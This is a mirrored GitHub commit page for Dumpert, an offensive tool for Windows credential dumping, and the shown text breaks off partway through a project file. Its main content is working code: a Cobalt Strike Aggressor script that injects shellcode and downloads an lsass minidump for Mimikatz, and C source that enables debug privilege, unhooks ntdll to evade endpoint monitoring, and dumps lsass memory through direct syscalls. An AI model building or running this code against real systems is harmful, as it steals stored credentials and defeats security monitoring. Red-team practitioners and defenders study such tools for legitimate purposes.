Mirrors/outflanknl-dumpert
1
0
Fork 0
mirror of https://github.com/outflanknl/Dumpert.git synced 2026-06-08 16:37:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

First commit

Browse Source
This commit is contained in:
Cn33liz
2019-06-19 12:23:39 +02:00
parent 4331bc08f5
commit 863463f211
17 changed files with 2020 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Dumpert-Aggressor/Outflank-Dumpert.bin
BIN
View File
Binary file not shown.
Dumpert-Aggressor/Outflank-Dumpert.cna
+35
View File
@@ -0,0 +1,35 @@
#author Cornelis de Plaa
#@outflank.nl
#injects a sRDI shellcode (shellcode Reflective DLL Injection) in current process and creates a minidump of lsass process.
#see https://github.com/monoxgas/sRDI
#register help
beacon_command_register("dumpert", "Create a minidump of lsass process",
"Synopsis: dumpert\n\n" .
"Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" .
"Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\"");
alias dumpert {
$bid = $1;
$curr_pid = beacon_info($bid, "pid");
if (-isadmin $bid) {
blog($bid, "Dumpert by Outflank");
if (-is64 $bid) {
bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin"));
blog($bid, "Waiting a few seconds for task to complete...");
bpause($bid, 10000);
bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp");
return;
}
else{
berror($bid, "Dumpert is x64 only.");
return;
}
}
else{
berror($bid, "You need elevated privileges.");
return;
}
}
Dumpert-DLL/Outflank-Dumpert-DLL.sln
Executable
+28
View File
@@ -0,0 +1,28 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Express 14 for Windows Desktop
VisualStudioVersion = 14.0.25420.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Outflank-Dumpert-DLL", "Outflank-Dumpert-DLL\Outflank-Dumpert-DLL.vcxproj", "{307088B9-2992-4DE7-A57D-9E657B1CE546}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.ActiveCfg = Debug|x64
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x64.Build.0 = Debug|x64
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.ActiveCfg = Debug|Win32
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Debug|x86.Build.0 = Debug|Win32
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.ActiveCfg = Release|x64
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x64.Build.0 = Release|x64
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.ActiveCfg = Release|Win32
{307088B9-2992-4DE7-A57D-9E657B1CE546}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
Executable
+321
View File
@@ -0,0 +1,321 @@
#undef _UNICODE
#define _UNICODE
#undef UNICODE
#define UNICODE
#include <Windows.h>
#include <stdio.h>
#include "Dumpert.h"
#include <DbgHelp.h>
#pragma comment (lib, "Dbghelp.lib")
BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
BYTE AssemblyBytes[] = {0x4C, 0x8B, 0xD1, 0xB8, 0xFF};
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory10;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory10;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory7SP1;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory7SP1;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory80;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory80;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
AssemblyBytes[4] = pWinVerInfo->SystemCall;
ZwWriteVirtualMemory = &ZwWriteVirtualMemory81;
ZwProtectVirtualMemory = &ZwProtectVirtualMemory81;
}
else {
return FALSE;
}
LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
ULONG OldProtection, NewProtection;
SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) {
return FALSE;
}
status = ZwWriteVirtualMemory(GetCurrentProcess(), lpProcAddress, (PVOID)AssemblyBytes, sizeof(AssemblyBytes), NULL);
if (status != STATUS_SUCCESS) {
return FALSE;
}
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) {
return FALSE;
}
return TRUE;
}
BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
pWinVerInfo->hTargetPID = NULL;
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation10;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory10;
NtFreeVirtualMemory = &NtFreeVirtualMemory10;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && pWinVerInfo->dwBuildNumber == 7601) {
ZwQuerySystemInformation = &ZwQuerySystemInformation7SP1;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory7SP1;
NtFreeVirtualMemory = &NtFreeVirtualMemory7SP1;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation80;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory80;
NtFreeVirtualMemory = &NtFreeVirtualMemory80;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
ZwQuerySystemInformation = &ZwQuerySystemInformation81;
NtAllocateVirtualMemory = &NtAllocateVirtualMemory81;
NtFreeVirtualMemory = &NtFreeVirtualMemory81;
}
else {
return FALSE;
}
ULONG uReturnLength = 0;
NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, 0, 0, &uReturnLength);
if (!status == 0xc0000004) {
return FALSE;
}
LPVOID pBuffer = NULL;
SIZE_T uSize = uReturnLength;
status = NtAllocateVirtualMemory(GetCurrentProcess(), &pBuffer, 0, &uSize, MEM_COMMIT, PAGE_READWRITE);
if (status != 0) {
return FALSE;
}
status = ZwQuerySystemInformation(SystemProcessInformation, pBuffer, uReturnLength, &uReturnLength);
if (status != 0) {
return FALSE;
}
_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
if (RtlEqualUnicodeString == NULL) {
return FALSE;
}
PSYSTEM_PROCESSES pProcInfo = (PSYSTEM_PROCESSES)pBuffer;
do {
if (RtlEqualUnicodeString(&pProcInfo->ProcessName, &pWinVerInfo->ProcName, TRUE)) {
pWinVerInfo->hTargetPID = pProcInfo->ProcessId;
break;
}
pProcInfo = (PSYSTEM_PROCESSES)(((LPBYTE)pProcInfo) + pProcInfo->NextEntryDelta);
} while (pProcInfo);
status = NtFreeVirtualMemory(GetCurrentProcess(), &pBuffer, &uSize, MEM_RELEASE);
if (pWinVerInfo->hTargetPID == NULL) {
return FALSE;
}
return TRUE;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation = { 0 };
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
BOOL SetDebugPrivilege() {
HANDLE hToken = NULL;
TOKEN_PRIVILEGES TokenPrivileges = { 0 };
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
return FALSE;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
LPWSTR lpwPriv = L"SeDebugPrivilege";
if (!LookupPrivilegeValueW(NULL, (LPCWSTR)lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
CloseHandle(hToken);
return FALSE;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
CloseHandle(hToken);
return FALSE;
}
CloseHandle(hToken);
return TRUE;
}
__declspec(dllexport) void __cdecl Dump() {
if (sizeof(LPVOID) != 8) {
exit(1);
}
if (!IsElevated()) {
exit(1);
}
SetDebugPrivilege();
PWIN_VER_INFO pWinVerInfo = (PWIN_VER_INFO)calloc(1, sizeof(WIN_VER_INFO));
// First set OS Version/Architecture specific values
OSVERSIONINFOEXW osInfo;
osInfo.dwOSVersionInfoSize = sizeof(osInfo);
_RtlGetVersion RtlGetVersion = (_RtlGetVersion)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlGetVersion");
if (RtlGetVersion == NULL) {
exit(1);
}
RtlGetVersion(&osInfo);
swprintf_s(pWinVerInfo->chOSMajorMinor, _countof(pWinVerInfo->chOSMajorMinor), L"%u.%u", osInfo.dwMajorVersion, osInfo.dwMinorVersion);
pWinVerInfo->dwBuildNumber = osInfo.dwBuildNumber;
// Now create os/build specific syscall function pointers.
if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"10.0") == 0) {
ZwOpenProcess = &ZwOpenProcess10;
ZwClose = &ZwClose10;
NtCreateFile = &NtCreateFile10;
pWinVerInfo->SystemCall = 0x3F;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.1") == 0 && osInfo.dwBuildNumber == 7601) {
ZwOpenProcess = &ZwOpenProcess7SP1;
ZwClose = &ZwClose7SP1;
NtCreateFile = &NtCreateFile7SP1;
pWinVerInfo->SystemCall = 0x3C;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.2") == 0) {
ZwOpenProcess = &ZwOpenProcess80;
ZwClose = &ZwClose80;
NtCreateFile = &NtCreateFile80;
pWinVerInfo->SystemCall = 0x3D;
}
else if (_wcsicmp(pWinVerInfo->chOSMajorMinor, L"6.3") == 0) {
ZwOpenProcess = &ZwOpenProcess81;
ZwClose = &ZwClose81;
NtCreateFile = &NtCreateFile81;
pWinVerInfo->SystemCall = 0x3E;
}
else {
exit(1);
}
_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)
GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
if (RtlInitUnicodeString == NULL) {
exit(1);
}
RtlInitUnicodeString(&pWinVerInfo->ProcName, L"lsass.exe");
if (!GetPID(pWinVerInfo)) {
exit(1);
}
pWinVerInfo->lpApiCall = "NtReadVirtualMemory";
if (!Unhook_NativeAPI(pWinVerInfo)) {
exit(1);
}
HANDLE hProcess = NULL;
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
CLIENT_ID uPid = { 0 };
uPid.UniqueProcess = pWinVerInfo->hTargetPID;
uPid.UniqueThread = (HANDLE)0;
NTSTATUS status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &uPid);
if (hProcess == NULL) {
exit(1);
}
WCHAR chDmpFile[MAX_PATH] = L"\\??\\";
WCHAR chWinPath[MAX_PATH];
GetWindowsDirectory(chWinPath, MAX_PATH);
wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), chWinPath);
wcscat_s(chDmpFile, sizeof(chDmpFile) / sizeof(wchar_t), L"\\Temp\\dumpert.dmp");
UNICODE_STRING uFileName;
RtlInitUnicodeString(&uFileName, chDmpFile);
HANDLE hDmpFile = NULL;
IO_STATUS_BLOCK IoStatusBlock;
ZeroMemory(&IoStatusBlock, sizeof(IoStatusBlock));
OBJECT_ATTRIBUTES FileObjectAttributes;
InitializeObjectAttributes(&FileObjectAttributes, &uFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
// Open input file for writing, overwrite existing file.
status = NtCreateFile(&hDmpFile, FILE_GENERIC_WRITE, &FileObjectAttributes, &IoStatusBlock, 0,
FILE_ATTRIBUTE_NORMAL, FILE_SHARE_WRITE, FILE_OVERWRITE_IF, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
if (hDmpFile == INVALID_HANDLE_VALUE) {
ZwClose(hProcess);
exit(1);
}
DWORD dwTargetPID = GetProcessId(hProcess);
BOOL Success = MiniDumpWriteDump(hProcess,
dwTargetPID,
hDmpFile,
MiniDumpWithFullMemory,
NULL,
NULL,
NULL);
ZwClose(hDmpFile);
ZwClose(hProcess);
return;
}
BOOL APIENTRY DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
Dump();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.h
Executable
+209
View File
@@ -0,0 +1,209 @@
#pragma once
#include <Windows.h>
#define STATUS_SUCCESS 0
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
typedef LONG KPRIORITY;
#define InitializeObjectAttributes( i, o, a, r, s ) { \
(i)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(i)->RootDirectory = r; \
(i)->Attributes = a; \
(i)->ObjectName = o; \
(i)->SecurityDescriptor = s; \
(i)->SecurityQualityOfService = NULL; \
}
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
typedef struct _WIN_VER_INFO {
WCHAR chOSMajorMinor[8];
DWORD dwBuildNumber;
UNICODE_STRING ProcName;
HANDLE hTargetPID;
LPCSTR lpApiCall;
INT SystemCall;
} WIN_VER_INFO, *PWIN_VER_INFO;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
HANDLE ProcessId;
HANDLE InheritedFromProcessId;
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
typedef struct _IO_STATUS_BLOCK
{
union
{
LONG Status;
PVOID Pointer;
};
ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
// Windows 7 SP1 / Server 2008 R2 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose7SP1(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory7SP1(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 8 / Server 2012 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 8.1 / Server 2012 R2 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
// Windows 10 / Server 2016 specific Syscalls
EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle);
EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength);
NTSTATUS(*NtAllocateVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
ULONG_PTR ZeroBits,
PSIZE_T RegionSize,
ULONG AllocationType,
ULONG Protect
);
NTSTATUS(*NtFreeVirtualMemory)(
HANDLE ProcessHandle,
PVOID *BaseAddress,
IN OUT PSIZE_T RegionSize,
ULONG FreeType
);
NTSTATUS(*ZwOpenProcess)(
PHANDLE ProcessHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PCLIENT_ID ClientId
);
NTSTATUS(WINAPI *ZwQuerySystemInformation)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
NTSTATUS(*ZwWriteVirtualMemory)(
HANDLE hProcess,
PVOID lpBaseAddress,
PVOID lpBuffer,
SIZE_T NumberOfBytesToRead,
PSIZE_T NumberOfBytesRead
);
NTSTATUS(*ZwProtectVirtualMemory)(
IN HANDLE ProcessHandle,
IN PVOID* BaseAddress,
IN SIZE_T* NumberOfBytesToProtect,
IN ULONG NewAccessProtection,
OUT PULONG OldAccessProtection
);
NTSTATUS(*NtCreateFile)(
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
PIO_STATUS_BLOCK IoStatusBlock,
PLARGE_INTEGER AllocationSize,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions,
PVOID EaBuffer,
ULONG EaLength
);
NTSTATUS(*ZwClose)(
IN HANDLE KeyHandle
);
typedef NTSTATUS(NTAPI *_RtlGetVersion)(
LPOSVERSIONINFOEXW lpVersionInformation
);
typedef void (WINAPI* _RtlInitUnicodeString)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
PUNICODE_STRING String1,
PCUNICODE_STRING String2,
BOOLEAN CaseInSensitive
);
Dumpert-DLL/Outflank-Dumpert-DLL/Outflank-Dumpert-DLL.vcxproj
Executable
+128
View File
@@ -0,0 +1,128 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{307088B9-2992-4DE7-A57D-9E657B1CE546}</ProjectGuid>
<RootNamespace>OutflankDumpertDLL</RootNamespace>
<WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v140</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<SDLCheck>true</SDLCheck>
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
